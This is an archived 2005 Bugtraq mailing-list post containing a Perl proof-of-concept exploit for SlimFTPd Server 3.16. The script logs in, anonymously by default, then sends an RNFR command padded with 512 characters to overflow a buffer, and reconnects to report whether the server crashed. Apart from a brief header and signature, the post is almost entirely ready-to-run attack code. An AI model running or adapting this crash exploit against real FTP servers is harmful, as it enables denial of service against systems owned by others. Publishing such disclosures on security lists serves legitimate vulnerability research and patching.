Bugtraq mailing list archives
SlimFTPd Server: PoC Exploit
From: Dim K0r0l <dim () acolytez com>
Date: Fri, 22 Jul 2005 01:51:25 +0000
--------------------------------------- Affected version: 3.16 Bug found by Raphaƫl Rigo PoC exploit for demonstration --------------------------------------- *#!/usr/bin/perl* /# --------------------------------------------------- #/ /# 47slimftpd_bof.pl - PoC exploit for SlimFTPd Server #/ /# version 3.16 #/ /# bug found by ml-bugtraq () twilight-hall net #/ /# #/ /# coded by k0r0l from acolytez team #/ /# visit http://acolytez.com for details #/ /# --------------------------------------------------- #/ *use* Net::FTP; /# geting data/ $host = @ARGV[0]; $port = @ARGV[1]; $debug = @ARGV[2]; $user = @ARGV[3]; $pass = @ARGV[4]; /# ===========/ *if* (($host) && ($port)) { /# make exploit string/ $exploit_string = *"*RNFR *"*; $exploit_string .= *"*X*"*x512; /# ===================/ print *"*Trying to connect to $host:$port\n*"*;$sock = Net::FTP->new(*"*$host*"*,Port => $port, TimeOut => 30, Debug => $debug) *or* die *"*[-] Connection failed\n*"*; print *"*[+] Connect OK!\n*"*;
print *"*Logging...\n*"*;
*if* (!$user) {
$user = *"*anonymous*"*;
$pass = *"*ftp () ftp com*"*;
}
$sock->login($user, $pass);
$answer = $sock->message;
print *"*Sending string...\n*"*;
$sock->quot($exploit_string);
print *"*Server $host may be down. Checking...\n*"*;
$sock = Net::FTP->new(*"*$host*"*,Port => $port, TimeOut => 30, Debug => $debug) *or* die *"*[-] Connection failed\n*"*;
*if* ($sock) {print *"*[-] Exploit failed.\n*"*;} *else* {print *"*[+] Server crashed!\n*"*;}
} *else* {
print *"*SlimFTPd Server - PoC Exploit\nhttp://AcolyteZ.com\n\nUsing: $0 host port username password [debug: 1 or
0]\n\n*"*;
}
-- +################################+ # Dim K0r0l (dim () acolytez com) # # # # http://AcolyteZ.com # # Net-security, coding, soft etc # +################################+
Current thread:
- SlimFTPd Server: PoC Exploit Dim K0r0l (Jul 22)